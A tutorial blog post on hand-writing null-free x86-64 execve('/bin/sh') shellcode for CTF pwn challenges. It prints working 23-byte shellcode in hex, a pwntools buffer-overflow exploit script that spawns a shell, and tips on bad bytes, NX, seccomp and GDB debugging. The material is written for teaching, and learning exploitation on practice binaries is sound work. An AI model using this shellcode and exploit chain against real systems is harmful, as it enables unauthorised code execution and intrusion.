June 7, 2026

Writing x86-64 Shellcode for CTF: From Syscall to Shell

Hand-write null-free x86-64 execve('/bin/sh') shellcode from scratch, fire it with pwntools, and debug it in GDB. The syscall is easy. Surviving the filter is the craft.

Shellcode is not magic

The first time I saw a line of shellcode, I assumed you needed a special tool to make it. It looks like noise. \x48\x31\xf6\x56\x48\xbf... is not a thing a person types, surely. Someone generated that. There's a machine somewhere that knows the secret.

There isn't. Shellcode is the most honest code in all of exploitation, and you can write it by hand in an afternoon. It is just machine code: the same instructions your CPU runs all day, except you are injecting them into a program that did not plan to run your instructions. The classic goal is to spawn a shell, which is where the name comes from. As Wikipedia puts it, the term "includes shell because the attack originally described an attack that opens a command shell". You overflow a buffer, you point the instruction pointer at your bytes, the CPU runs them, and you get a /bin/sh prompt on a machine that was never supposed to give you one.

Here is the thing that bugs me about how shellcode gets taught. It gets treated as the hard, scary part of binary exploitation, the dark art at the bottom of the stack. It is the opposite. The syscall is easy. You will understand it in the next five minutes. The actual difficulty is everything the CTF does to stop your bytes from arriving intact: null bytes that truncate your payload, length caps, character filters, a stack the kernel refuses to execute. That is the craft, and almost none of it is the assembly.

The syscall is the easy twenty-three bytes. The craft is getting those bytes to survive the trip.

This post is the missing piece under two others on this site. The Buffer Overflow guide gets you control of the instruction pointer, and the ROP guide is what you reach for when you cannot inject code. Both lean on shellcode without ever teaching it. By the end here you will be able to hand-write a null-free execve("/bin/sh"), fire it with pwntools, and step through it in GDB (the GNU Debugger) when it inevitably crashes the first time. We'll target Linux x86-64, because that is what almost every modern pwn challenge ships.

A shell is one syscall

Start with the only idea you actually need. To run a program on Linux, you call one syscall: execve. Its man page signature is execve(const char *pathname, char *const argv[], char *const envp[]). To spawn a shell, you want execve("/bin/sh", NULL, NULL). On Linux that is legal: the man page says passing NULL for argv or envp has "the same effect as specifying the argument as a pointer to a list containing a single null pointer." A shell with no arguments and no environment. That is all we want.

So the whole job is: put the right values in the right registers, then execute the syscall instruction. On x86-64, the kernel reads syscall arguments from a fixed set of registers. This table is the entire contract you program against, and it is worth memorizing because you will use it constantly:

Register       Holds                For execve
rax            Syscall number       59 (0x3b)
rdi            Argument 1           pointer to "/bin/sh"
rsi            Argument 2           argv = 0 (NULL)
rdx            Argument 3           envp = 0 (NULL)
r10, r8, r9    Arguments 4, 5, 6    unused here

One detail that trips people up: the fourth argument lives in r10, not rcx. Regular function calls use rcx for the fourth argument, but the syscall instruction clobbers rcx and r11 for its own bookkeeping (it stashes the return address and flags there), so the kernel ABI (Application Binary Interface) substitutes r10. You can read this straight off the syscall(2) man page. You don't need r10 for a shell, but the day you write an open/read/write chain, that is the footgun waiting for you.

Warning: The syscall numbers are architecture-specific. On x86-64, execve is 59. On 32-bit i386 it is 11, passed in eax via int 0x80 instead of syscall. If you copy a 32-bit tutorial and write mov al, 11 on a 64-bit target, you do not get a shell. You call syscall 11, which is munmap, and your process unmaps its own memory and dies. I have done this. It is a confusing five minutes. The authoritative number lives in the kernel's syscall_64.tbl, or the searchable Filippo Valsorda table.
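To make the mix-up concrete, here is a minimal sketch with a handful of syscall numbers copied by hand for the two ABIs. The SYSCALLS dictionary and the name_of helper are made up for this illustration (they are not a pwntools API), and the table is deliberately tiny.

```python
# A few syscall numbers per architecture, copied by hand for illustration.
# For real work, read the kernel's syscall tables instead of this dict.
SYSCALLS = {
    "amd64": {"read": 0, "write": 1, "open": 2, "munmap": 11, "execve": 59},
    "i386": {"exit": 1, "read": 3, "write": 4, "open": 5, "execve": 11},
}


def name_of(arch: str, number: int) -> str:
    """Return the syscall name for a number on the given architecture."""
    for name, nr in SYSCALLS[arch].items():
        if nr == number:
            return name
    return "unknown (not in this tiny table)"


# The same number means different things depending on the ABI.
print(name_of("i386", 11))   # execve
print(name_of("amd64", 11))  # munmap
```

Same number, different kernel entry point. That is the whole bug.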

Your first shellcode, the version that doesn't work

Two facts about the stack first, because the whole payload leans on them. The stack is just a region of scratch memory the program already gave us, and it grows downward: each push moves the stack pointer (rsp) to a lower address and writes there. So whatever you push last sits at the lowest address, and the thing you pushed before it sits just above. Hold onto that.

We can't point at a "/bin/sh" string that does not exist in the binary, so we build it ourselves. The trick is to treat the seven characters as the bytes of a number and push that number. On a little-endian machine the first character ends up in the lowest byte, so "/bin/sh" plus a null terminator becomes the 64-bit immediate 0x0068732f6e69622f (read it right to left: 2f is /, 62 is b, and so on, with the leading 00 as the terminator). Push that, point rdi at it, set the other registers, and fire. pwntools assembles the text for us so we can read the bytes in hex. (If pwntools is new, the pwntools guide covers the basics.)
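If the right-to-left reading feels slippery, you can check the constant in plain Python before assembling anything. This is only a sanity check with the standard library; nothing here is pwntools.

```python
path = b"/bin/sh\x00"  # seven characters plus the terminator = 8 bytes

# Interpret the 8 bytes as a little-endian integer: first byte is lowest.
imm = int.from_bytes(path, "little")
print(hex(imm))  # 0x68732f6e69622f (Python drops the leading 00)
assert imm == 0x0068732F6E69622F

# Going the other way recovers the bytes in memory order.
assert imm.to_bytes(8, "little") == path
```

With the constant checked, the pwntools listing below assembles it into the full payload.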

from pwn import *
context.arch = 'amd64'
sc = asm('''
mov rdi, 0x0068732f6e69622f /* '/bin/sh\0' little-endian */
push rdi
mov rdi, rsp /* rdi -> the string on the stack */
mov rsi, 0 /* argv = NULL */
mov rdx, 0 /* envp = NULL */
mov rax, 59 /* execve */
syscall
''')
print(sc.hex(), len(sc))

This is correct assembly. It would work if you could deliver it cleanly. Run it and look at the bytes, though, and you can already see the problem:

$ python3 first_try.py
48bf2f62696e2f73680057...48c7c600000000... (37 bytes)
                  ^^           ^^^^^^^^
                  |            four more null bytes from 'mov rsi, 0'
                  a null byte

Two things are wrong, and both are about the bytes, not the logic. "/bin/sh" is seven characters, but mov rdi, imm64 wants a full eight-byte immediate, so the eighth byte is the 0x00 string terminator, encoded right there in the instruction. And mov rsi, 0 encodes the literal value zero as four null bytes. Same for mov rdx, 0, and mov rax, 59 carries three more in its upper bytes. The shellcode is riddled with 0x00. Why does that matter? Because of how it gets delivered.

The null bytes that quietly kill your shellcode

Your shellcode does not teleport into the target. It travels through an input function, and most of the input functions that give you an overflow in the first place restrict which bytes get through. strcpy treats your bytes as a C string: it copies until it hits a 0x00 and then stops. gets accepts null bytes but stops at a newline (0x0a), and scanf("%s") stops at any whitespace byte. So if your shellcode contains a null byte at offset 9 and passes through strcpy, the program copies the first nine bytes and throws the rest away. You jump to a beautiful payload that got guillotined before it arrived.
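Here is a small model of that guillotine, assuming the delivery function behaves like strcpy. The strcpy_view helper is a name invented for this sketch; it only mimics the stop-at-first-null rule, not a real C library call.

```python
def strcpy_view(payload: bytes) -> bytes:
    """Return what a C string copy would keep: everything before the first 0x00."""
    return payload.split(b"\x00", 1)[0]


# First ten bytes of the naive shellcode: mov rdi, 0x0068732f6e69622f
naive_head = bytes.fromhex("48bf2f62696e2f736800")
rest = bytes.fromhex("57")  # push rdi, which never gets copied

survived = strcpy_view(naive_head + rest)
print(len(survived), survived.hex())  # 9 48bf2f62696e2f7368
```

Nine bytes land, and the instruction they belong to is not even complete.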

The fix is a small set of encoding tricks. None of them are clever, exactly. They are just the habits of someone who has been bitten enough times. Here are the three that matter most, drawn from abatchy's shellcode reduction notes:

  1. Zero a register with xor, not mov. mov rsi, 0 encodes the zero literally: null bytes. xor rsi, rsi produces the same result, costs three bytes (48 31 f6), and contains no null. The 32-bit form xor esi, esi is two bytes (31 f6) and still clears the whole register, because writing a 32-bit subregister zeroes the upper half. A register xored with itself is always zero.
  2. Write small numbers into the small register. mov rax, 59 sets the full 64-bit register, so the encoding (48 c7 c0 3b 00 00 00) carries three zero bytes of sign-extended immediate. mov al, 59 writes only the low 8 bits and encodes as b0 3b: one opcode, one value, no null. It leaves the upper 56 bits of rax untouched, though, so it is only safe when they are already zero. (Better still, push 59; pop rax, which also clears the upper bits cleanly.)
  3. Use the "/bin//sh" trick for the string. The doubled slash pads "/bin/sh" to exactly eight bytes, so it fills one register with no terminator and no null byte inside the immediate. The kernel collapses redundant slashes during path resolution, so "/bin//sh" runs the exact same program as "/bin/sh".

That last one is my favorite hack in all of exploitation. The path resolver was always going to flatten // into /, and someone realized you could lean on that to dodge a null byte for the cost of a single character.
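A quick way to see the three habits pay off is to count the nulls in each encoding. The byte strings below are copied by hand from the standard x86-64 encodings rather than produced by an assembler here, so treat the table as an illustration and confirm with asm() on your own machine.

```python
# Hand-copied x86-64 encodings (an assumption of this sketch: they are
# typed in from the opcode tables, not assembled by this script).
ENCODINGS = {
    "mov rsi, 0": bytes.fromhex("48c7c600000000"),
    "xor rsi, rsi": bytes.fromhex("4831f6"),
    "xor esi, esi": bytes.fromhex("31f6"),
    "mov rax, 59": bytes.fromhex("48c7c03b000000"),
    "mov al, 59": bytes.fromhex("b03b"),
    "push 59; pop rax": bytes.fromhex("6a3b58"),
}

for text, code in ENCODINGS.items():
    print(f"{text:18} {code.hex():16} len={len(code)} nulls={code.count(0)}")

# The doubled slash fills all eight bytes of the immediate with no null.
padded = b"/bin//sh"
print(len(padded), b"\x00" in padded)  # 8 False
```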

Note: Null is the most common bad byte, but it is not the only one. If your input goes through a line reader, 0x0a (newline) and 0x0d (carriage return) will also truncate or mangle the payload. The general technique is bad-character discovery: send a sequence of every byte from 0x01 to 0xff, trigger the crash, and compare what landed in memory against what you sent. Any byte that got dropped or changed is a byte your final shellcode must avoid.
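The comparison step is easy to script. Below is a minimal sketch, assuming you have already dumped the landed bytes from the debugger into a bytes object; first_bad_byte is a hypothetical helper name, and the "target" here is simulated with a line reader that stops at the first newline.

```python
from typing import Optional


def first_bad_byte(sent: bytes, landed: bytes) -> Optional[int]:
    """Return the first sent byte that did not arrive intact, or None."""
    for i, byte in enumerate(sent):
        if i >= len(landed) or landed[i] != byte:
            return byte
    return None


probe = bytes(range(1, 256))  # every byte from 0x01 to 0xff

# Simulated target (an assumption for the demo): a line reader that
# stops at the first newline, so nothing from 0x0a onward lands.
landed = probe.split(b"\n", 1)[0]

bad = first_bad_byte(probe, landed)
print(hex(bad))  # 0xa
```

In practice you loop: drop the byte it reports from the probe, resend, and repeat until it returns None. That finds one bad byte per round, which is slow but hard to get wrong.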

The 23-byte execve, one byte at a time

Apply all three tricks and you converge on the shellcode that has been copy-pasted into a thousand exploits. The commonly cited version is 23 bytes (this exact one is Exploit-DB 46907). It is worth typing out and understanding, because once you see why each instruction is there, you can rebuild it from memory and adapt it when a constraint forces a change.

; execve('/bin//sh', NULL, NULL) -- 23 bytes, no null bytes
48 31 f6                         xor rsi, rsi          ; rsi = 0 (argv = NULL, and a terminator)
56                               push rsi              ; push 8 null bytes: the string's \0 terminator
48 bf 2f 62 69 6e 2f 2f 73 68    mov rdi, '/bin//sh'   ; the 8-byte string, no null inside
57                               push rdi              ; '/bin//sh' now sits on the stack
54                               push rsp              ; push the address of the string
5f                               pop rdi               ; rdi -> '/bin//sh'
6a 3b                            push 0x3b             ; 0x3b = 59
58                               pop rax               ; rax = 59 (execve), upper bits cleared
99                               cdq                   ; rdx = 0 (envp = NULL) via sign-extend
0f 05                            syscall               ; go

Read it top to bottom. We zero rsi and push it first. Because the stack grows down, that block of zeros ends up just above the string we push next, which gives the string its \0 terminator for free (and rsi stays 0 for our NULL argv). Then we load "/bin//sh" into rdi and push it, so now rsp points right at the string. We copy that address into rdi with push rsp; pop rdi (two bytes; mov rdi, rsp would also work and is null-free, but the push/pop pair is one byte shorter and the habitual way to do it). We set rax to 59 with another push/pop. The one instruction that always looks like a typo is cdq (one byte, 0x99): it sign-extends eax into edx, and since eax is the small positive number 59, the sign bit is 0, so edx becomes 0. Writing edx zeroes the whole of rdx for free. One byte to set envp = NULL. That is the kind of detail that makes hand-written shellcode shorter than anything a tool emits.

Every byte in that block earns its place. It is the shortest correct program most people will ever write.

Tip: You do not have to memorize the hex. You memorize the shape: zero the string terminator, build the string, point rdi at it, set rax to 59, zero rsi and rdx, syscall. If you can recite the shape, pwntools or even nasm will produce the bytes for you, and you will recognize when they look wrong.
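If you want to check the 23-byte listing without an assembler, you can rebuild it from its hex in plain Python and test the properties that matter. This is a sketch that verifies the bytes; it does not execute them. The cdq function is a toy model of the instruction, written for this example.

```python
# The instructions from the 23-byte listing, one entry per instruction.
PARTS = [
    ("xor rsi, rsi", "4831f6"),
    ("push rsi", "56"),
    ("mov rdi, '/bin//sh'", "48bf2f62696e2f2f7368"),
    ("push rdi", "57"),
    ("push rsp", "54"),
    ("pop rdi", "5f"),
    ("push 0x3b", "6a3b"),
    ("pop rax", "58"),
    ("cdq", "99"),
    ("syscall", "0f05"),
]

shellcode = b"".join(bytes.fromhex(h) for _, h in PARTS)

print(len(shellcode))        # 23
print(b"\x00" in shellcode)  # False
print(b"\n" in shellcode)    # False


def cdq(eax: int) -> int:
    """Model cdq: edx becomes 32 copies of eax's sign bit (bit 31)."""
    return 0xFFFFFFFF if eax & 0x80000000 else 0


print(cdq(59))  # 0
```

The cdq model also shows the trap: if eax held a value with bit 31 set, edx would come out as 0xffffffff, not zero. The trick only works because rax was just set to a small positive number.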

The other way it fails: a stack that refuses to run code

Suppose your 23 bytes arrive perfectly intact and you jump to them. On a modern system, nothing happens except a crash. That is NX (No-eXecute), also called DEP (Data Execution Prevention): the kernel marks the stack and other data pages non-executable, and the CPU faults the instant it tries to fetch an instruction from one. Code goes in code pages, data goes in data pages, and your shellcode is data sitting on the stack.

Compilers turn this on by default. GCC emits a program header called PT_GNU_STACK marked non-executable, and the kernel honors it (you can see pwntools check exactly this in its ELF.nx property). So the first thing to do with any pwn binary is run checksec:

$ checksec --file=./vuln
RELRO      STACK CANARY    NX             PIE
Partial    No canary       NX disabled    No PIE
                           ^^^^^^^^^^^
                           executable stack: ret2shellcode is on the table

If checksec says NX disabled, the stack is executable and you can drop shellcode straight onto it and jump in. A challenge author makes that happen with gcc -z execstack, or by shipping an object that lacks the .note.GNU-stack marker. When you see it, the author is telling you: this is a shellcode challenge. If NX is enabled, the stack is dead to you, and you have three options: find an mmap'd region the program made executable for you, use a short ROP chain to call mprotect and make your buffer executable, or give up on injection entirely and switch to return-oriented programming, which reuses code that is already there. (A jmp rsp trampoline solves a different problem: it finds your shellcode on an executable stack whose address you do not know. It does nothing against NX.)
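The PT_GNU_STACK check is simple enough to do by hand, which is a good way to see that checksec is not magic either. Here is a minimal sketch using only the struct module. It handles little-endian ELF64 files only, and gnu_stack_executable is a name chosen for this example, not a pwntools function.

```python
import struct
from typing import Optional

PT_GNU_STACK = 0x6474E551  # program header type carrying stack permissions
PF_X = 0x1                 # "executable" bit in p_flags


def gnu_stack_executable(elf: bytes) -> Optional[bool]:
    """True/False from PT_GNU_STACK's flags; None if the header is absent.

    Handles little-endian ELF64 only, which covers x86-64 Linux binaries.
    """
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    # ELF64 header fields: e_phoff at 0x20, e_phentsize at 0x36, e_phnum at 0x38.
    (e_phoff,) = struct.unpack_from("<Q", elf, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    for i in range(e_phnum):
        # Each ELF64 program header starts with p_type, then p_flags.
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None  # no marker: the outcome depends on the kernel and architecture
```

Call it as gnu_stack_executable(open('./vuln', 'rb').read()). True means the executable-stack bit is set, which is what checksec reports as NX disabled. The None case is left undecided on purpose, since what a missing header means has differed across kernels.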

Key insight: NX is the single biggest reason a beginner's shellcode "doesn't work" when the bytes are perfect. Always checksec first. If NX is on, no amount of fixing your assembly will help, because the problem was never your assembly. Pick a different technique.

Firing it with pwntools (and why you still learn the hard way)

Now the honest part, and it is the whole reason this post exists: pwntools can generate shellcode for you, but what it generates is the floor of what you can do, not the ceiling. In a real CTF you will usually not type out 23 bytes of hex. There is a code generator called shellcraft that hands you working shellcode for dozens of operations. The shell is one line:

from pwn import *
context.arch = 'amd64'
# print the assembly shellcraft would use:
print(shellcraft.amd64.linux.sh())
# get the runnable bytes:
sc = asm(shellcraft.amd64.linux.sh())
print(len(sc), 'bytes')

So why did we just spend a whole post hand-writing it? Because shellcraft's output is bigger than the hand-rolled 23 bytes, it can contain bytes your filter rejects, and when it does not fit or does not work, you have to know why to fix it. Tools encode the what. Hand-rolling teaches you the why, and the why is what lets you repair tool output the moment a challenge breaks it.

Here is the full delivery for a non-NX overflow: find the offset to the saved return address with a cyclic pattern, write your shellcode somewhere you know the address of, and overwrite the return address to jump to it.

from pwn import *
context.binary = elf = ELF('./vuln') # sets context.arch automatically
# 1) find the offset to saved RIP with a unique pattern
io = process('./vuln')
io.sendline(cyclic(200))
io.wait()
core = io.corefile # core dump from the crash
offset = cyclic_find(core.fault_addr) # where our pattern hit RIP
log.info('offset = %d', offset)
# 2) build the payload: shellcode + padding + return into the shellcode
sc = asm(shellcraft.amd64.linux.sh())
buf = elf.symbols['buffer'] # assumes the input lands in a global named 'buffer' at a fixed (non-PIE) address
payload = sc.ljust(offset, b'\x90') + p64(buf) # NOP-pad up to RIP, then jump back
io = process('./vuln')
io.sendline(payload)
io.interactive() # enjoy your shell

The cyclic and cyclic_find pair is pure pwntools convenience: cyclic(200) generates a 200-byte De Bruijn sequence where every 4-byte window is unique, so the controlled value that overwrote the return address (pwntools hands it to you as core.fault_addr) maps back to one exact offset. The b'\x90' bytes are NOPs (NOP is the no-operation instruction, 0x90). Note where ljust puts them: after the shellcode, as harmless filler up to the saved return address, so the jump has to hit buf exactly. A true NOP sled goes in front of the shellcode: a runway of do-nothing bytes so that if your jump address is slightly off, execution slides down the NOPs into your real shellcode instead of crashing next to it.
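To see the payload layout byte for byte, here is the same construction with only the standard library, where struct.pack("<Q", ...) stands in for p64. The shellcode stand-in, the offset of 40, and the address 0x404080 are placeholder values invented for this sketch; build_payload is likewise a hypothetical helper.

```python
import struct


def build_payload(shellcode: bytes, offset: int, target: int) -> bytes:
    """shellcode | 0x90 filler up to `offset` | 8-byte little-endian target."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    # ljust pads on the right, so the filler follows the shellcode.
    return shellcode.ljust(offset, b"\x90") + struct.pack("<Q", target)


# Placeholder values for illustration only: a 23-byte stand-in payload,
# a made-up offset of 40, and a made-up buffer address.
sc = b"\xcc" * 23
payload = build_payload(sc, 40, 0x404080)

print(len(payload))          # 48
print(payload[:23] == sc)    # True: shellcode sits at the very start
print(payload[23:40].hex())  # 17 filler bytes of 90
print(payload[40:].hex())    # 8040400000000000
```

Look at the last line: the packed address ends in zero bytes. That is one reason the address goes last in the payload, where a string copy stopping at the first null costs you nothing that matters.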

When it crashes anyway: debugging shellcode in GDB

It will crash the first time. It always does. The difference between someone who can write shellcode and someone who gets stuck is entirely about what they do next, and the answer is never "stare at the Python harder." You open a debugger and watch the bytes. The GDB CTF guide covers the full workflow; here is the shellcode-specific loop.

Attach GDB (I strongly recommend the pwndbg plugin, which prints registers and disassembly on every stop), break at the moment of the crash, and ask three questions in order:

  1. Did my whole payload arrive? x/24bx $rsp (or wherever your buffer is). Compare the bytes in memory to the bytes you sent. If it stops short, you have a bad byte that truncated it. Go back to the null-byte tricks.
  2. Am I even executing my bytes? Set a breakpoint on the buffer address and confirm rip reaches it. If it never does, your offset or return address is wrong, or NX faulted you before the first instruction. info proc mappings shows whether the page you jumped to is executable.
  3. Where exactly does it die? stepi one instruction at a time through your shellcode, watching the registers after each step. The crash will land on a specific instruction, and the register state right before it tells you what assumption was wrong.

Do not guess. Single-step the bytes and watch the registers. Shellcode is short enough that you can step the entire thing in under a minute, and the crash always explains itself.

Warning: A myth worth killing, because it costs people hours: the famous "add an extra ret for 16-byte stack alignment" rule does not apply to raw shellcode. That movaps crash comes from glibc functions like system that are compiled with SSE and assume the stack is 16-byte aligned at a call. It is a ret2libc problem. A pure execve syscall never executes those glibc prologues, so alignment is simply not your bug. If your raw shellcode dies, it is a bad byte, a non-executable page, or a wrong address. Not alignment. It is probably the single most common wrong turn in shellcode debugging, so cross it off the list first.

What CTFs do to make this genuinely hard

If every challenge let you drop 23 clean bytes onto an executable stack, shellcode would be a solved problem and nobody would write challenges about it. The interesting ones attack the delivery channel. Here are the constraints you will actually meet, roughly in order of how often they show up.

1. Bad characters

Null is just the start. A filter might strip newlines, reject anything above 0x7f, or ban specific bytes. Find them with a byte-by-byte diff, then rewrite the offending instructions or run the payload through an encoder.

2. Length caps

When the buffer holds only 20-something bytes, the 23-byte hand-rolled execve is your friend and the bloated shellcraft output is not. This is exactly when hand-writing pays for itself.

3. seccomp

A seccomp filter can ban execve outright. Then a shell is impossible, and you pivot to open + read + write to read the flag file directly.

Printable and alphanumeric shellcode. Some filters only accept printable ASCII, or even only letters and digits. You cannot express syscall (0f 05) in printable bytes, so the trick is a decoder stub: a small chunk written entirely in printable opcodes that, at runtime, writes the real shellcode into memory and jumps to it. You rarely build these by hand. Real tools do it: ae64 for x86-64, SkyLined's alpha3 (and alpha2), and msfvenom's x86/alpha_mixed encoder. Knowing they exist, and that they need a register pointing near your payload, is usually enough.
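You can check the printable claim yourself in a few lines. This sketch treats printable ASCII as the range 0x20 to 0x7e, which is an assumption: a real filter may be stricter (letters and digits only) or looser. non_printable is a helper name made up for the example.

```python
def non_printable(code: bytes) -> list:
    """Return (offset, byte) pairs that fall outside printable ASCII 0x20-0x7e."""
    return [(i, b) for i, b in enumerate(code) if not 0x20 <= b <= 0x7E]


syscall = bytes.fromhex("0f05")
print(non_printable(syscall))      # [(0, 15), (1, 5)]
print(non_printable(b"/bin//sh"))  # []
```

Both bytes of syscall fail, which is exactly why the decoder stub has to write them into memory at runtime instead of carrying them in the input.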

seccomp, concretely. When a binary installs a seccomp-bpf filter, dump it with seccomp-tools so you can read exactly which syscalls are allowed:

$ seccomp-tools dump ./vuln
line CODE JT JF K
...
0005: if (A != execve) goto 0007
0006: return KILL # execve is banned, no shell for you
0007: return ALLOW # open / read / write still allowed

That output is a gift. It tells you the shell is off the table and the open/read/write path is open, so you write shellcode that opens the flag file, reads it into a buffer, and writes it to stdout. Same skill, different syscall numbers (open is 2, read is 0, write is 1), same register table from the top of this post.
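Before writing any assembly for that chain, it helps to lay the three calls out against the register table. This is a planning sketch only, not runnable shellcode. The path 'flag.txt' is a placeholder, and the string entries describe values that exist only at runtime.

```python
# (name, rax, rdi, rsi, rdx) for each step; strings describe runtime values.
ORW_PLAN = [
    ("open", 2, "pointer to path, e.g. 'flag.txt'", "0 (O_RDONLY)", "0 (mode, unused)"),
    ("read", 0, "fd returned in rax by open", "pointer to scratch buffer", "byte count"),
    ("write", 1, "1 (stdout)", "same scratch buffer", "bytes read (rax from read)"),
]

for name, rax, rdi, rsi, rdx in ORW_PLAN:
    print(f"{name:5} rax={rax}  rdi={rdi}; rsi={rsi}; rdx={rdx}")
```

The detail to notice is the hand-off: each syscall returns its result in rax, so open's file descriptor has to move into rdi before you overwrite rax with the next syscall number.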

Note: One beautiful constrained example: picoCTF 2021 Filtered Shellcode inserts two 0x90 NOP bytes after every two bytes of your input. The fix is to write your shellcode as a sequence of two-byte instructions, so the injected NOPs land harmlessly between your real instructions instead of corrupting them. That is shellcode as a genuine puzzle, and it only makes sense once you understand the bytes.
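A toy model of that filter makes the puzzle obvious. The nop_filter function below follows the behavior as described in this post (two 0x90 bytes after every two input bytes); it is not taken from the challenge source, and how the real binary treats a trailing odd byte is an assumption here.

```python
def nop_filter(data: bytes) -> bytes:
    """Insert two 0x90 bytes after every two input bytes."""
    out = bytearray()
    for i in range(0, len(data), 2):
        out += data[i:i + 2] + b"\x90\x90"
    return bytes(out)


# Two-byte instructions survive: each pair stays together.
two_byte = bytes.fromhex("31c0" "b00b")  # xor eax, eax ; mov al, 11
print(nop_filter(two_byte).hex())        # 31c09090b00b9090

# A five-byte instruction gets NOPs spliced into its immediate.
five_byte = bytes.fromhex("b80b000000")  # mov eax, 11
print(nop_filter(five_byte).hex())       # b80b909000009090009090
```

In the second case the CPU decodes b8 0b 90 90 00 as one instruction with a corrupted immediate, and everything after it is misaligned garbage.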

picoCTF challenges to practice on

Reading shellcode is not the same as landing one. Go break these, in roughly this order:

  • picoCTF 2021 Binary Gauntlet 1 is the cleanest possible ret2shellcode. NX is off, the program prints the buffer address, you write shellcode there and overflow the return address to jump to it. If you only do one, do this.
  • picoCTF 2021 Binary Gauntlet 2 is the same idea with a remote-reliability twist: solvers added a NOP slide before the shellcode so the jump did not have to be byte-perfect.
  • picoCTF 2021 Filtered Shellcode is the NOP-injection puzzle from the callout above. It forces you to think about instruction-level byte layout, which is the real lesson.
  • picoCTF 2025 Handoff combines a stack pivot with shellcode because the initial overflow window is too small for a full payload. Good bridge between this post and the ROP ladder.

If you want the history, read Aleph One's 1996 paper "Smashing the Stack for Fun and Profit", which popularized injected stack shellcode. His line still sums up the whole game: "In most cases we'll simply want the program to spawn a shell. From the shell we can then issue other commands as we wish." Thirty years later, that is still exactly what those 23 bytes do. For a browsable library of shellcodes by architecture, the shell-storm database and Exploit-DB are the standard references.

Quick reference

The decision order for a shellcode challenge

  1. checksec ./vuln. Is NX off? If yes, ret2shellcode is live. If no, switch to ROP.
  2. Find the input function. strcpy means no null bytes, gets means no newlines, and scanf("%s") means no whitespace.
  3. Is there a length cap? If tight, hand-roll the 23-byte execve. If roomy, use asm(shellcraft.amd64.linux.sh()).
  4. Is there a charset filter? Run the payload through ae64 / alpha3 / msfvenom.
  5. seccomp-tools dump ./vuln. If execve is banned, write open/read/write instead.
  6. It crashes. Open GDB, check the bytes arrived, check the page is executable, stepi to the dying instruction.

Syscall numbers (x86-64) and the register table

rax = number rdi = arg1 rsi = arg2 rdx = arg3 r10 = arg4 r8 = arg5 r9 = arg6
execve = 59 (0x3b) read = 0 write = 1 open = 2 rt_sigreturn = 15
(32-bit i386 is different: execve = 11, via int 0x80. Do not mix them up.)

pwntools cheat sheet

context.arch = 'amd64' # or context.binary = ELF('./vuln')
sc = asm(shellcraft.amd64.linux.sh()) # ready-made shell shellcode
print(shellcraft.amd64.linux.sh()) # see the assembly it used
off = cyclic_find(core.read(core.rsp, 4)) # offset to saved RIP (first 4 bytes of the pattern at rsp)
payload = sc.ljust(off, b'\x90') + p64(buf) # NOP-pad, then jump to the shellcode
io.interactive() # shell

The bytes were never magic. They are a syscall number, three registers, and a handful of tricks to keep null bytes out. Everything that feels hard about shellcode is the channel, not the code: whether your bytes arrive whole, whether the page they land on is allowed to run, whether a filter ate them on the way in.

One concrete move to make this stick. Find a binary with an executable stack (or compile one with gcc -z execstack -fno-stack-protector vuln.c -o vuln) and write the 23-byte execve from memory. Run it under strace and watch the execve("/bin//sh", NULL, NULL) line appear. The moment you see your own bytes turn into that syscall, the mystery is gone for good.